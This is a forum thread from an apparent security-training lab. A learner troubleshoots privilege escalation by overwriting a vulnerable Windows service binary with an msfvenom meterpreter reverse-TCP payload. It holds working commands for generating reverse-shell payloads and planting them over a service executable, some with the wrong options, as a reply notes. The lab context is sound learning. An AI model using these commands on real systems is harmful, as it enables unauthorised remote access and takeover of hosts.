
pwn6394
Bronze I
23 days ago
Solved

Ep 7 Post Exploitation With Metasploit

I’m having issues with q9 and don’t know why what I’m currently doing isn’t working.

I’ve run SharpUp.exe and found a vulnerable binary location (C:/Windows/Important-Service/Important-Service.exe).

From my original meterpreter session, I have uploaded a new msfvenom payload called Important-Service.exe to the location above, in the hope of spawning a new shell on another listener.

Nothing is happening when I start the service or execute the exe. Any pointers with this one? I feel that what I am doing is correct and should work.

5 Replies

  • You've definitely overwritten the existing binary in the C:\Windows\Important-Service\ folder? You're sure your binary is on the box and [more importantly] in the correct place (I used meterpreter's "upload" command to get it on the box, then spawned a shell and manually used "copy" to move it (it should ask you if you're sure you want to overwrite the original file))?

    What payload are you using for msfvenom? Checking my limited notes, the screenshots definitely show a windows/x64/meterpreter/reverse_tcp session coming back after I'd uploaded the exe file and manually copied it over the existing one. Only possible thing I can think of (that I've done myself in the past) is a mismatch between x86 and x64 payloads on opposite ends of your meterpreter session? 

    • pwn6394
      Bronze I

      Evening. Yes, I've overwritten the existing binary using a new .exe I created (below). I used a basic shell rather than Meterpreter to copy it across once on the box (using Meterpreter upload) and got confirmation of the overwrite (below). Still not getting a reverse shell back on my second listener. I've manually tried to start the service, but that fails to get the session. Is there anything else that I'm missing? I have confirmed that the architecture is x64, so my payload should work. Do you have to run the execute_dotnet_assembly module again, or other Meterpreter modules? Thank you. It will be something really silly that I have overlooked.

      msfvenom -p windows/x64/meterpreter/reverse_tcp RPORT=5555 RHOSTS=10.102.***.*** -f exe -o Important-Service.exe

      copy /v Important-Service.exe C:\Windows\Important-Service

      • autom8on
        Silver I

        Erm, shouldn't those be LHOST/LPORT?

  • Thanks for getting back to me. As far as I’m aware, my upload is going to the correct directory. I’m using the following command in my meterpreter session, with my msfvenom payload the same as you mention. I’ll have another play later on; it’s most likely not being uploaded to the correct location, as I don’t get an overwrite prompt. Thank you.

    upload Important-Service.exe C:/Windows/Important-Service/Important-Service.exe

    msfvenom -p windows/x64/meterpreter/reverse_tcp RPORT=1234 RHOSTS=10.102.118.165 -f exe -o Important-Service.exe